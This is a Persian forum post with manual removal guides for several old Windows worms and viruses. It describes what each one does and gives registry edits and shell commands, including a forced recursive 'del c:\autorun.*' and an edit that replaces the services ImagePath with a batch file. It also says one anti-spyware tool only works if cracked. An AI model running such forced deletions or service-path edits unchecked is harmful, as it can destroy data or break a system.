اگر بر روی هر درایو کلیک می کنید پنجره open with باز می شود به دلیل پاک شدن فایلی می باشد که مسئول باز کردن درایو می باشد .
شما می توانید از برنامه زیر برای حل این مشکل استفاده کنید . البته قبل از ان باید ویروس autoran را از درایو های خودتون پاک کرده باشید . بعد از اجرا کردن برنامه باید چند دقیقه منتظر باشید تا برنامه کار خود را انجام دهد . بعد از اینکه کارش به اتمام رسید به شما پیغام می دهد . پس صبور باشید .


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

گاهی اوقات نیز وقتی بر روی هر برنامه ای که دارای پسوند exe می باشد کلیک می کنید پنجره open with باز می شود برای حل این مشکل هم باید از برنامه زیر استفاده کید .


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])




================================================== =============


نحوه پاک کردن ويروس Virus Win32/Jeefo يا SVCHOST.EXE

بعلت وجود ويروسي مخرب به اسم Jeefo که با نام SVCHOST.EXE البته در شاخه ديگري غير از فايل اصلي ساکن مي شود و اقدام به خرابکاري تمام فايلهاي اجرايي exe مي کند .
اکثر انتي ويروس ها SVCHOST.EXE را به عنوان ويروس مي شناسند . در حالي که SVCHOST.EXE ويروس نيست بلکه ويروس فايل ديگري مي باشد که خود را به اين نام در اورده است .
اين ويروس باعث مي شود که برنامه ها درست اجرا نشوند . و طولاني بودن زمان الودگي سيستم باعث از کار افتادن سيستم عامل مي شود.


نحوه پاک کردن ويروس

ابتدا سعي کنيد System Restore را غير فعال کنيد .
براي اين کار ابتدا روي my computer راست کليک کنيد و سپس properties را بزنيد از پنجره باز شده به تب
System Restore رفته و تيک گزينه Turn off System Restore on all drives را بزنيد و بعد پنجره را ok کرده و به سوال پرسيده شده جواب مثبت دهيد .

حال ابتدا با زدن سه کليد ترکيبي ctrl + alt + delete وارد Task Manager شويد و به تب Processes رفته و از اوجا فايل SVCHOST.EXE در حال اجرا توي ويندوز را پاک مي کنيم .

البته در تب Processes شما حداقل 4 تا يا بيشتر SVCHOST.EXE در حال اجرا مي بينيد که بايد با برنامه هاي مديريت پروسه هاي Task Manager بتونيد اين فايل را تشخيص دهيد . زيرا اين برنامه ها مسير پروسه هاي اجرايي را در Task Manager نشان مي دهند . اين فايل بيشتر خود را با نام يوزر که در ان هستيد (Log On) اجرا مي کند .
حال به مسير C:\WINDOWS رفته و فايل SVCHOST.EXE را پاک مي کنيم .
البته شما نبايد فايل اصلي SVCHOST.EXE را که در مسير C:\WINDOWS\System32 قرار دارد را پاک کنيد .

بعد از اين کار سيستم را ريستارت کنيد .

سپس سيستم را در حالت safe mode راه اندازي کرده و انتي ويروس jeefogui را اجرا کنيد .
ممکن است بعد از اين عمليات بعضي از فايلهاي exe شما از کار بيفتند که شما بايد دوباره برنامه انها را نصب کنيد .

انتی ویروس jeefogui


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])


================================================== =============


پاک کردن ويروسي که از طريق یاهو مسنجر منتشر مي شود

عملکرد اين ويروس

1- در ابتدا ويروس صفحه شخصي اينترنت اکسپلورر (Default IE Page) را به يک سايت تغيير مي دهد. در اين صورت به هيچ طريق امکان عوض کردن آن وجود نخواهد داشت. بعد از هر باز باز کردن يک صفحه وب جديد، ويروس مجددآ خود را در سيستم شما کپي مي کند.

غير فعال کردن Task Manager و رجيستري
ايجاد فايلهايي با نام هاي svhost.exe , svhost32.exe , internat.exe


نحوه از بين بردن اين ويروس و مشکل

ابتدا با استفاده از روشهاي گفته شده در بالا Task Manager و رجيستري را فعال کنيد .
اتصال خود به اينترنت را قطع کنيد .
حال براي برگرداندن صفحه نخست مروگر خود به حالت قبل وارد رجيستري شويد .
ابتدا وارد منوي استارت شويد و روي گزينه run کليک کنيد و عبارت regedit را نوشته تا وارد رجيستري شويد .

ميسر هاي زير را با دقت پيدا نموده و در آنها وارد شويد حال اسم سايت مورد نظر را که در home page شما قرار گرفته است را پاک کرده و اسم سايت خودتان را بنويسيد مثلا

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدسپس به internet option رفته و اين کار را هم انجام دهيد se current- use default -use blank


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

انتی ویروس Y.V.Remover



برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


================================================== =============


رفع مشکل غیر فعال شدن Home Page اینترنت اکسپلورر

1 . در کادر محاوره ای Run عبارت Regedit را تایپ کنید و از روی کیبرد کلید Enter را فشار دهید تا محیط ویرایش رجیستری ظاهر شود .
2 . به مسیر زیر بروید و 2 متغییر DWORD با نام های RunOnceComplete و RunOnceHasShown به ارزش 1 بسازید .

3 .

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
محیط ویرایش رجیستری را ببندید و مجددا در کادر محاوره ای Run عبارت inetcpl.cpl را تایپ کنید و شستی OK را فشار دهید تا کادری با عنوان Internet Properties ظاهر شود .

4 . در قسمت Home Page آدرس مورد علاقه ی خود را تایپ کنید و شستی OK را فشار دهید تا تنظیمات دلخواه ذخیره شود .

5 . اکنون Internet Explorer 7 را اجرا کنید و لذت ببرید .

کسانی که این مشکل را از راه اصولی حل کرده اند و اکنون دوست دارند روش فوق را تست کنند ، مراحل زیر را دنبال نمایید ...

1 . در کادر محاوره ای Run عبارت inetcpl.cpl ,6 تایپ کنید و شستی OK را فشار دهید تا کادری با عنوان Internet Properties ظاهر شود .

2 . در زبانه ی Advanced دکمه ی Reset را فشار دهید تا کادر دیگری با عنوان Reset Internet Explorer Settings خودنمایی کند .

3 . مجددا روی دکمه ی Reset کلیک کنید تا تمام تنظیمات IE به حالت پیش فرض بر گردد .

4 . اکنون روش دوم را جهت تغییر Home Page تست کنید


================================================== =============


نحوه از بین بردن ویروس services.exe

متاسفانه اکثر ویروسهایی که جدیدا به وجود می ایند همنام پروسه های مربوط به سیستم عامل می باشند به همین دلیل تشخیص انها هم برای کاربران و هم برای انتی ویروس ها نسبتا مشکل شده است .
و از کار انداختن انها نیز قدری سخت شده است .

و همین عامل می تواند یکی از نقاط ضعف سیستم عامل های ماکروسافت محسوب شود .

فعالیت های ویروس services.exe

اولین کاری که این ویروس انجام می دهد خودش را با نام فایلهایی که در یک فولدر است در می اورد و فایلهای فولدر را مخفی می کند و یک فایل با نام همان فولدر می سازد که دارای پسوند exe می باشد .

و به فولدر هایی که مخفی می کند علاوه بر خصلت hidden خصلت سیستمی هم می دهد .

سپس به وسیله windows policy برنامه های regedit و cmd و msconfig و taskmanager رو از کار می اندازد(گاهی اوقات هنگام استفاده از دستور cmd کامپیوتر را ریستارت هم میکند) در بعضی مواقع از قسمت folder option گزینه view رو مخفی میکند.

و اجازه دسترسی به بعضی از گزینه های مدیریتی رو بطور کامل از بین میبرد .

و حتی با تعویض ویندوز هم فایلها از حالت مخفی خارج نخواهند شد . به خاطر این که با تعویض ویندوز هنوز اثرات این ویروس در دیگر درایو ها وجود دارد و تنها با کلیک کردن روی یکی از انها ویروس فعال شده و دوباره همه جا را الوده می کند .

نحوه از بین بردن ویروس services.exe

برای از بین بردن این ویروس ابتدا کدهای زیر را داخل note pad کپی کرده و با نام و پسوند rescue.bat در مسیر در مسير c:\ ذخيره نماييد.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

حالا به منوي start رفته و روی گزینه run کلیک کنید و عبارتregedit را تايپ کرده و ok را بزنيد. تا وارد محیط رجیستری شوید .
حال به مسير زير برويد.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
روي فايل image path دوبار کليک کرده و در اين پنجره به جاي %systemroot%\system32\services.exe عبارت c:\rescue.bat را تايپ کنيد.
ويندوز را restart کنيد.
دوباره به منوي start رفته و برنامه run را اجرا کرده و regedit را تايپ کرده و ok را بزنيد.
حال به مسير زير برويد.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
روي فايل image path دوبار کليک کرده و در اين پنجره به جاي c:\rescue.bat عبارت %systemroot%\system32\services.exe را تايپ کنيد.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
userinit را از مسير بالا باز کرده و به جاي عبارت %windir%\services.exe عبارت C:\WINDOWS\system32\userinit.exe را وارد کنید

عبارت %windir%\services.exe را حذف نماييد يعني مسير به صورت زير در مي آيد.

C:\WINDOWS\system32\userinit.exe

به پوشه temp رفته و در صورت وجود فایل Service.exe ان را پاک کنید .
حالا آنتي ويروس های kaspersky و nod32 را update نماييد و سیستم را به طور کامل در حالت safe mode ویروس یابی کنید .

ضمناً بهتر است بعد از update و ويروس يابي ويندوز خود را عوض کنيد.

anti spyware برای از بین بردن ویروس services.exe

این انتی spyware یکی از بهترین ها برای از بین بردن ویروس services.exe می باشد .


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])

فقط توجه داشته باشید که این anti spyware ویروس services.exe را پیدا می کند و برای از بین بردن انها حتما باید این برنامه کرک شده باشد .



================================================== =============

مهم : نحوه برگردوندن فایلهایی که به صورت سیستمی مخفی شده اند

همون طور که می دونید ویروس services.exe فایلهای شما را به صورت سیستمی مخفی می کند و شما قادر به دیدن اونها نیستید . شما می توانید از روش زیر به فایلهای خودتون دسترسی داشته باشد .
کافی است نام درایو و مسیر فایل خود را در مسیر زیر وارد کرده و سپس این مسیر را در run کپی کرده و سپس ok را بزنید تا فایلهای شما نمایان شوند.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

( به جای drive نام درایو حاوی فایل مخفی را بنویسید و به جای file path مسیر فایل را به طور کامل بنویید .)


================================================== =============


روشی برای تشخیص این که فایلهای درون فولدر حذف شده اند یا اینکه به حالت سیستمی در امده اند

گاهی اوقات وقتی به داخل یکی از فولدرهایی که تعداد زیادی فایل درون ان داریم رجوع می کنیم با کمال تعجب متوجه می شویم که فولدر ما خالی است و هیچ یک از فایلهایی که قبلا وجود داشتند دیگر وجود ندارند .
در این قسمت روشی را به شما اموزش می دهم که با این روش می توانید متوجه شوید که ایا فایلهای شما واقعا حذف شده اند یا این که به حالت سیستمی مخفی شده اند .

براي اينکه بتونيد فايلها را ببينيد از منوي Start روي گزينه run کليک کرده و سپس عبارت cmd را تايپ کنيد و سپس ok را بزنید


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]


بعد از باز شدن محيط cmd در ان تايپ کنيد dir /A name_of_the_folder با اين کار تمامي فایلهایی که به حالت سیستمی در امده اند قابل روئت خواهند بود . و شما متوجه خواهید شد که فایلها حذف نشده اند . و با استفاده از روش بالا می توانید انها را از حالت سیستمی خارج کنید .


نکته : name_of_the_folder نام فولدری می باشد که اطلاعات شما در ان مخفی شده است .


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]



با این برنامه هم می تونید تا حدودی فایلهای Hidden شده خودتون را UnHidden کنید .


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])


================================================== =============

بازگردانی سریع فایلهای مخفی شده

این هم روشی برای کسانی که می خواهند به سرعت به فایلهای مخفی خودشون دسترسی پیدا کنند .
برای این کار کافی است دستورات زیر را داخل Notepad کپی کنید و بعد ان را با نام و پسوند mahdi.bat ذخیره کنید و بعد ان را اجرا کنید . چند لحظه منتظر بمانید تا فایلهای مخفی نمایان شوند .
تذکر : با این روش فایلهای سوپر هایدن نیز قابل روئیت خواهند بود .




برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


================================================== =============

ویروس Win32/PSW.Agent.NDP

این ویروس باعث غیرفعال شدن گزینه show hidden files and folders در folder option می شود و باعث عدم نمایش فایلهای مخفی می شود و اجازه نمی دهد کاربرها فایلهای مخفی را از حالت مخفی بیرون بیاورند .

این ویروس با دستکاری رجیستری ویندوز باعث می شد که شما نتونید تنظیمات hidden file and folder را تغییر دهید .
به محض تغییر دادن این قسمت و خارج شدن از ان تنظیمات به حالت پیش فرض خود برمیگردند .
البته این ویروس خرابکاریهای دیگری هم انجام می دهد اول اینکه داخل تمام درایوهای شما یه فایل autorun.inf می سازد که درایوهای هارد شما را autorun می کند .

دوم اینکه دوباره داخل تمام درایوها یک فایل به نام ntde1ect می سازد که شما به محض اینکه فلاپی وارد سیستم کنید یا فلش یا mp3 pleyer را به کامپیوتر متصل کنید یک کپی از خودش به صورت hidden وارد دستگاه شما یا فلاپی شما می کند که شما متوجه ان نمی شوید .

البته فایل ntde1ect خیلی شبیه فایل ntdetect هست که داخل درایو C وجود دارد و برای بالا امدن ویندوز ضروری می باشد .
مواظب باشید این دو فایل را اشتباه نگیرید .
سوم اینکه با اجرای فایل avpo.exe به شما اجازه نمیدهد که فلش یا mp3 pleyer یا هر چیز دیگه رو از پورت USB ، safe remove کنید .



[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]




نحوه پاک کردن ویروس Win32/PSW.Agent.NDP


در حالت safe mode وارد ویندوز شوید . ( با زدن دکمه F8 قبل از بالا آمدن ویندوز حالت safe mode را انتخاب کنید )


پنجره Task Manager را باز کنید (Ctrl-Alt-Delete) و برنامه های زیر را در صورت اجرا ببندید .
wscript.exe : اگر در حال اجرا بود آن را ببندید (End process)
avpo.exe : اگر در حال اجرا بود آن را ببندید (End process)


از قسمت start برنامه Run را اجرا کنید و در عبارت cmd را در آن تایپ کنید و enter را بزنید .
در این قسمت در خط فرمان برنامه ، دستور زیر زیر را تایپ کنید و enter را بزنید .


del c:\autorun.* /f /a /s /q
این دستور را برای درایوهای دیگر اجرا کنید . با این دستور تمام فایلهایautorun موجود delete می شود .


در این مرحله در خط فرمان c:\ دستور زیر را تایپ کنید تا وارد پوشه system32 شوید :


C:\cd windows\system32
C:\windows\system32


در ادامه دستور زیر را تایپ کنید و آنرا اجرا کنید .


*.*dir /a avp


در این قسمت هر فایلی به نامهای avp0.dll و avpo.exe و avp0.exe دیده شد آنرا پاک کنید .
attrib -r -s -h avpo.exe
del avpo.exe


بعد از این مراحل تمام پنجره ها رو ببندید و برنامه registry را اجرا کنید :


(Run \regedit)
مسیر زیر را دنبال کنید :

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


در این قسمت هر کلیدی که به نام avpo.exe بود را delete کنید .


در برنامه registry قسمت edit گزینه Findرا کلیک کنید و عبارت ntde1ect را جستجو کنید. تمام کلیدهای پیدا شده را delete کنید .
این کار را برای فایل avpo.exe نیز انجام دهید و تمام کلیدهای پیدا شده راdelete کنید .


در آخر کار سراغ کلید زیر بروید و مقدار CheckedValue را برابر 1 قرار دهید .


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید



================================================== =============



ويروس kernel.exe





kernel ويروسي است که هر چند دقيقه يکبار با error ي که در زير تصوير ان را قرار داده ام ظاهر مي شود . اکثر کاربران به اين ويروس گرفتار شده اند .




در واقع اين يک ويروس نيست زيرا کار مخربي روي سيستم انجام نمي دهد . در واقع يک برنامه مي باشد که شباهتي به ويروس دارد و به همين دليل هيچ يک از انتي ويروس ها قادر به شناسايي و پاک کردن ان نيستند . حتي قوي ترين و به روز ترين انتي ويروس ها .

اين ويروس از طريق صفحات html که از اينترنت ذخيره مي کنيد به وجود مي ايد .






اين ويروس سه فايل با نام هاي kernal.vbs و kernal.exe و systems.exe دارد که هر سه فايل در پوشه C:\WINDOWS\system32 ذخيره مي شوند .

در واقع اين ويروس خود را جزء پروسه هاي سيستم عامل نيز مي داند و در task manager در تب processes با نام kernel.exe در حال فعاليت مي باشد .






اين ويروس همه ي فايل هاي HTML و Htm رو آلوده ميکند و به آخر فايل ها کدهاي مخرب Vbscript رو که چند تا فايل با نام ها kernel.exe و kernel.vbs است را ايجاد ميکند .

اين ويروس حتي با تعويض سيستم عامل هم از بين نخواهد رفت .






از اثرات اين فايل آلوده:

1- ارورهاي پشت سر هم

2- باعث پايين آمدن سرعت کامپيوتر
3- باعث پايين آمدن سرعت اينترنت
4- دادن اطلاعات مثل يوزر و پسورد اينترنتتان به شخص هکر
5- آلوده کردن فايلهاي HTML







[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]






نحوه پاک کردن ويروس kernel.exe




براي پاک کردن اين ويروس شما بايد ابتدا با زدن کليد هاي ترکيبي ctrl + alt + delete وارد task manager شويد و به تب processes رفته و فايلي با نام kernel.exe را پاک کنيد .




سپس به مسير زير رفته C:\WINDOWS\system32 رفته و دو فايل با نام kernel و بک فايل با نام Systems را پيدا کرده و پاک کنيد .




توجه داشته باشيد شما در صورتي مي توانيد اين فايلها را پاک کنيد که پروسه kernel.exe را از task manager پاک کرده باشيد . در غير اين صورت اجازه پاک شدن را به شما نخواهد داد .




سپس به منوي استارت رفته و عبارت msconfig را در run تايپ کنيد و در قسمت startup اگر فايلهاي بالا وجود دارند تيک انها را برداريد و سپس کامپيوتر را ريستارت کنيد دوباره چک کنيد که ويروس در حافظه بار نشده باشد .

بعد به internet temporary از طريق مسير زير رفته و تمام محتويات ان را خالي کنيد .







برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید





برنامه براي از بين بردن اين ويروس


لینک برنامه از سایت سازنده برنامه) این لینک شامل نسخه کامل شده این انتی ویروس می باشد(



[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])



دانلودبرنامه از پرشین گیگ


[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]




نکته مهم :

گاهی بعضی از کاربران گله از این موضوع دارند که این انتی ویروس و روش ذکر شده برای ویروس kernel.exe توی ویندوز ویستا عمل نمی کنند .
در جواب این دوستان باید عرض کنم این error ی که در ویندوز ویستا داده می شود و شباهت زیادی به همین error دارد ربطی به این ویروس ندارد و اصلا ویروس kernrl.exe نیست .
به خاطر این که این ویروس به هیچ وجه توی ویندوز ویستا ایجاد نمی شود .

این error توی ویستا به دلیل این است که شما برنامه ای روی ویستا نصب کردید که سازگاری با ویندوز ویستا ندارد .


================================================== =============




ویروس Antichrist (virus hoax)0



تصاویری از این ویروس


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


این ویروس یا کرم با پیغامی که می دهد در واقع شما را به راه راست هدایت می کند و به نام ویروس ستایش نیز معروف است .

این ویروس که با نام های Day of Judgmet و Antichrist هم شناخته می شود یک کرم ایرانی است که سیستم عامل های ویندوز ۳۲ بیتی را مورد حمله قرار می دهد.


از مشخصه های بارز این کرم می توان به موارد زیر اشاره کرد:


غیرفعال کردن Folder Option


باز شدن صفحه اینترنتی با عنوان Day of Judgment (به معنی روز داوری) که ترجمه انگلیسی سوره حمد بر روی پس زمینه سبز در آن مشاهده می شود.

این هم تصویر صفحه html




[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]



این صفحه در هر بار بوت شدن ویندوز به شما نشان داده می شود.همچنین در هر بار بوت شدن ویندوز پنجره ای با تیتر Antichrist و با محتوای Day of Judgment نمایش داده می شود.

در بعضی مواقع جلوی اجرای Regedit و Task Manager با آلوده شدن توسط این ویروس گرفته می شود .



سرعت کلی سیستم به شدت پایین می آید و در فهرست پروسس های ویندوز می توانید Sys.exe و در قسمت برنامه های startup نام wma.exe و blank.htm را مشاهده کنید.


و گاهی اوقات هنگام بالا امدن ویندوز یک فایل html در ادرس c:\windows\system32\blank.htm اجرا می گردد .


همچنین ویروس خود را در تمام درایوها با نام Autoplay.exe کپی می کند که با هر بار کلیک روی درایو ها منتشر می شود .

این هم متن AUTORUN این WORM .



برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

اين كرم ايراني پس از اجراي فايل آن بر روي سيستم كاربر، ابتدا خودش را به صورت ‏زير بر روي سيستم كپي مي‌نمايد:‏



برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
و براي اينکه با هر بار بالا آمدن سيستم اين فايل‌ها اجرا گردند، آنها را به شکل زير در ‏رجيستري ثبت مي‌کند:‏



برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
همچنين در مسير System32 فايلي با نام ‏OEMLOGO.BMP‏ به صورت ‏مخفي ايجاد مي‌کند که به شکل زير

مي‌باشد:‏


بعلاوه در همين مسير فايلي با نام ‏OEMLOGO.INI‏ به صورت مخفي مي‌سازد که ‏محتويات آن به شکل زير است:‏



برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

فايل ديگري نيز در همين مسير با نام ‏blank.htm‏ به صورت مخفي ايجاد مي‌کند که با ‏اجراي آن صفحه‌اي به شکل زير به نمايش درمي‌آيد:‏



که متن انگليسي نمايش داده شده در اين صفحه ترجمه سوره حمد مي‌باشد. آنگاه براي ‏اينکه با هر بار بالا آمدن سيستم اين فايل نمايش داده شود آن را به صورت زير در ‏رجيستري ثبت مي‌کند:‏




برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
براي اينکه مقدار ‏Home Page‏ و ‏Search Page‏ نرم‌افزار ‏Internet Explorer‏ را ‏برابر با صفحه مذکور قرار دهد، تغييرات زير را در رجيستري ايجاد مي‌نمايد:‏



برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

از کارهاي جالب اين ويروس اين است که در همه درايوها در داخل مسير ‏Recycler‏ ‏فولدري مخفي و با نام تصادفي ايجاد کرده و يک کپي از خودش را با نام ‏Sys.exe‏ ‏درون آن قرار مي‌دهد.




همچنين اثرات ديگري به شکل زير دارد:‏

با ايجاد تغييراتي در رجيستري باعث مي‌شود که قبل از ورود به سيستم صفحه‌اي با تيتر ‏Antichrist‏ و با متن ‏Day of judgment‏ نمايش داده شود. همچنين باعث مي‌شود ‏فايل‌هاي ‏Super Hidden‎‏ نمايش داده نشود. جلوي اجراي برنامه‌هاي ‏RegEdit‏ و ‏Task Manager‏ را گرفته و رنگ زمينه ‏Windows‏ و صفحه ‏cmd‏ را تغيير مي‌دهد. ‏بعلاوه نام ‏User‏ و ‏Organization‏ ثبت شده براي سيستم را با [Antichrist] تغيير مي‌دهد.‏

لازم به ذکر است که آخرين نگارش ضدويروس سيمانتك اين کرم اينترنتي را شناخته و به صورت کامل پاکسازي مي‌نمايد.
براي پاكسازي اثرات باقي مانده اين ويروس همانند غير فعال شدن Registry يا Folder Option و يا باز نشدن درايوها با دابل كليك بر روي آنها و غيره از ابزار پاكسازي زير يا بالاي صفحه استفاده نماييد





[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])




نحوه از بین بردن ویروس Antichrist


متاسفانه فعلا حتی نسخه های بروزشده آنتی ویروس Eset NOD۳۲ قادر به شناسایی و خنثی نمودن این ویروس نمی باشند.

اما حداقل سه آنتی ویروس Kaspersky (در نسخه ۷ آزمایش شد) ، McAfee (نسخه ۲۰۰۸) و احتمالا آخرين نگارش ضدويروس سيمانتک (به نقل از سایت امنیتی دمسان) قادر به شناسایی و پاک کردن ویروس مذکور هستند.

من خودم انتی ویروس سیمانتک ( Norton ) را توصیه می کنم چون این انتی ویروس اولین انتی ویروسی بود که این کرم را پیدا و کاملا پاک می کند . حتما سعی کنید به طور کامل این انتی ویروس را اپدیت کنید و بعد تمام درایو ها را اسکن کنید .



برای پاک کردن این ویروس ابتدا آنتی ویروس خودتان را به آخرین بسته های بروزرسانی مجهز کنید سپس اقدام به کنترل سیستم نمایید.

توصیه می کنم که تمام هارد را برای یافتن ویروس اسکن نمایید


نکته : حتما سیستم خودتان را در حالت safe mode ویروس یابی کنید .

و از کلیک کردن روی درایو ها تا پاک شدن کامل ان خود داری کنید .



بعد از پاک شدن ویروس قسمتهای حذف شده را مانند روشهای بالا می توانید برگردانید .

و سپس باید به تمام درایو ها رفته و autoplay.exe را پاک کنید .

نکته : نحوه پاک کردن ویروس autoplay.exe یا autoran را بالا به طور کامل ذکر شده است .




به رجیستری رفته و مسیر زیر را دنبال کنید



برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


روی run کلیک کنید و هر چیزی سمت راست اگر گزینه های زیر وجود دارند انها را پاک کنید .
blank
igfxhkcmd
igfsexper
igfxtray
vxds

همه این کارها را باید در حالت safe mode انجام دهید .



================================================== =============



کرم Imaut-A


Imaut-A يك كرم كامپيوتري براي سيستم هايويندوزي است .
اين كرم خودش رادر شبكه هاي share شده و درايوهاي قابل انتقال بهصورت زير كپي مي كند :


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


همچنين مدخل زير در رجيستري ايجاد مي شود تا smss.exe بتواند اجرا شود :


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


مدخل زير نيز تغيير مي كند تا killer.exe بتواند با آغاز ويندوز اجرا شود :


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

مدخل هاي زير نيز تغيير مي كنند :[/RIGHT]


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید



روش هایی برای پاک کردن این کرم





1 . به روز كردن آنتيويروس




2. روش پاك سازي توسط آنتي ويروس سوفوسبراي حذف يك كرمكامپيوتري كارهاي زير را انجام دهيد :




همه ي برنامه هاي خود را ببنديدبرنامه Sophos Anti-Virus را از لینک های زیر دریافت کنید .






[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])




مراحل Start|Programs| SophosAnti-Virus را بگذرانيد وبرنامه آنتي ويروس را اجرا كنيد تب Immediate و سپس درايو مورد نظر را انتخاب كنيد به Options|Configuration رفته و تب Disinfection يا Action را انتخاب كرده سپس Infected file و بعد از آن Delete را انتخاب كنيد و در آخر OK را بزنيد




براي اجرا كردن پويش ، scan يا دكمه GO را بزنيد فايل هاي مورد نظر را پاك كنيد، سپس يك پويش ديگر را اجرا كنيد تا مطمئن شويد پاك سازي صورت گرفته استبه Options|Configuration برگرديد و تب Disinfection يا Action انتخاب كرده سپس Infected files و بعد از آن Delete را انتخاب كنيد و در آخر OK را بزنيد كامپيوتر را Reboot كرده و پويش نهايي را اجرا كنيد تا كاملا مطمئن شويدپاك ساري صورت گرفته است




روش پاك سازي به صورت دستي :




ابتدا تمامي داده خود را در سيستم تغيير داده و يك كپي از آنهاتهيه كنيد.




پسورد Administrator را دوباره تغيير دهيد و يك نگاهي به مسايلامنيتي شبكه خود بيندازيد.




در taskbar دكمه start را بزنيد و منوي run رااجرا كنيد و در آن Regedit را بنويسيد و دكمه ok را كليك كنيد تا صفحه ويرايشگررجيستري شما باز شود . فراموش نكنيد كه قبل از دستكاري رجيستري يك نسخه پشتيبان ازآن تهيه كنيد .

براي تهيه نسخه پشتيبان از رجيستري خود ؛ در منوي Registry رويگزينه Export Registry File و در پنلExport range گزينه All را انتخاب كرده و سپسدكمه Save را كليك كنيد تا نسخه پشتيبان از رجيستري شما تهيه شود.





حال درمدخل HKEY_CURRENT_USER رجيستري زيرمدخل:



برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید[/RIGHT]



هر مدخلي كه به فايلي اشاره مي كرد حذف كنيد.




همچنين در مدخل HKEY_LOCAL_MACHINE مقدار VALUE از CheckedValue را 1 و از Shell را explorer.exe بگذاريد :



برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


سپس رجيستري خود را ببنديد و دوباره سيستم خود را راه اندازي كنيد.




================================================== =============




کرم Wukill ) W32/Wukill.worm.gen )






[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]





طریقه گسترش کرم :




آلودگی با اجرای فایل کرم انجام می شود . که کرم با فلاپی و تمامی وسایل انتقال فایل منتقل می شود . چون خود ا در هر پوشه ای که باز کنید کپی می کند .




در کامپیوتر آلوده :

بعد از قرار دادن فلاپی ، کرم خود را در آن کپی می کند و یا اگر شخص سیدی رایت کند ، کرم را که به صورت مخفی است را نیز رایت خواهد کرد .





در کامپیوتر میزبان :

اگر شخص از ویندوز های 98 , 2000 , ME و ویندوز هایی که از Customize Folder Wizard استفاده می کند ، داشته باشد با باز کردن پوشه یا فلاپی درایوی که کرم در آن وجود دارد آلوده خواهد شد . چون کرم از آین سرویس ویندوز استفاده کردن و جود را اجرا می کند .
در ویندوز xp چون این سرویس غیر فعال است و دیگر وجود ندارد آلودگی فقط با اجرای مستقیم کرم شروع می شود . در ویندوز های دیگر نیز با اجرای مستقیم کامپیوتر آلوده می شود . بعد از اجرای فایل اگر باز بخواهید فایل را اجرا کنید اختار زیر ظاهر می شود :






[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]





کرم خود را با نام های مختلف در یکی از پوشه های Windows ، Temp ، System ، Web ، Help کپی می کند .




و در تمامی پوشه هایی که وارد شوید یک فایل اجرایی با نام پوشه می سازد و در همان پوشه فایل desktop.ini یا Rundesktop.ini را تغییر می دهد و در آن کدهای زیر را اضافه می کند :





